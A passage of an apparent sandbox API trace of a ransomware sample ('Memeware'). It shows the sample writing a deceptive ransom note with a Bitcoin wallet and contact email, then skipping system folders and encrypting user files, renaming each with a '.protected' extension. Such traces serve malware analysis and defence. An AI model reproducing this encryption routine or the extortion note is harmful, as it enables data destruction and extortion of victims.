(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.876] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.876] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.880] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.880] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.880] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.880] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.880] CloseHandle (hObject=0xd8) returned 1 [0093.881] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", 
lpString2="$Recycle.bin") returned 1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0093.881] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned 57 [0093.881] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0093.881] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0093.881] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*") returned 59 [0093.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.882] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.882] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.882] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\.") returned 59 [0093.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.882] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.883] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.883] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.883] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\..") returned 60 [0093.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Windows") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files (x86)") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="$Recycle.bin") returned 1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="System Volume Information") returned -1 [0093.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.883] StrStrIW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".protected") returned 0x0 [0093.883] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0093.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x14c [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".rar") returned 0x0 [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".zip") returned 0x0 [0093.884] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.888] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.888] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.889] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.889] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.890] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.890] CloseHandle (hObject=0x14c) returned 1 [0093.890] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected") returned 92 [0093.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.protected")) returned 1 [0093.891] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Windows") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files (x86)") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="$Recycle.bin") returned 1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="System Volume Information") returned -1 [0093.891] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.891] StrStrIW (lpFirst="LocalMLS_3.wmdb", lpSrch=".protected") returned 0x0 [0093.891] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0093.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.892] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".rar") returned 0x0 [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".zip") returned 0x0 [0093.893] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.897] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.897] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.898] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.898] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.905] WriteFile 
(in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.905] CloseHandle (hObject=0x14c) returned 1 [0093.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected") returned 83 [0093.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.protected")) returned 1 [0093.906] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Windows") returned -1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files") returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files (x86)") returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="$Recycle.bin") returned 1 [0093.909] lstrcmpiW (lpString1="Sync Playlists", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 72 [0093.910] lstrcmpW (lpString1="Sync Playlists", lpString2=".") returned 1 [0093.910] lstrcmpW (lpString1="Sync Playlists", lpString2="..") returned 1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") 
returned 74 [0093.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\.") returned 74 [0093.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.910] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.910] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\..") returned 75 [0093.910] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.910] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.910] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW 
(lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.911] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.911] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 78 [0093.911] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.911] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.911] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 80 [0093.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\.") returned 80 [0093.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.912] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.912] lstrcmpiW 
(lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\..") returned 81 [0093.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.912] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Windows") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files (x86)") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 87 [0093.912] lstrcmpW (lpString1="00010C6E", lpString2=".") returned 1 [0093.912] lstrcmpW (lpString1="00010C6E", lpString2="..") returned 1 [0093.912] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 89 [0093.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0093.919] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.919] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.919] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\.") returned 89 [0093.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.919] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.920] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.920] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\..") returned 90 [0093.920] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.920] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.920] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0093.920] wnsprintfW 
(in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.920] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0093.920] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.920] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.920] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW 
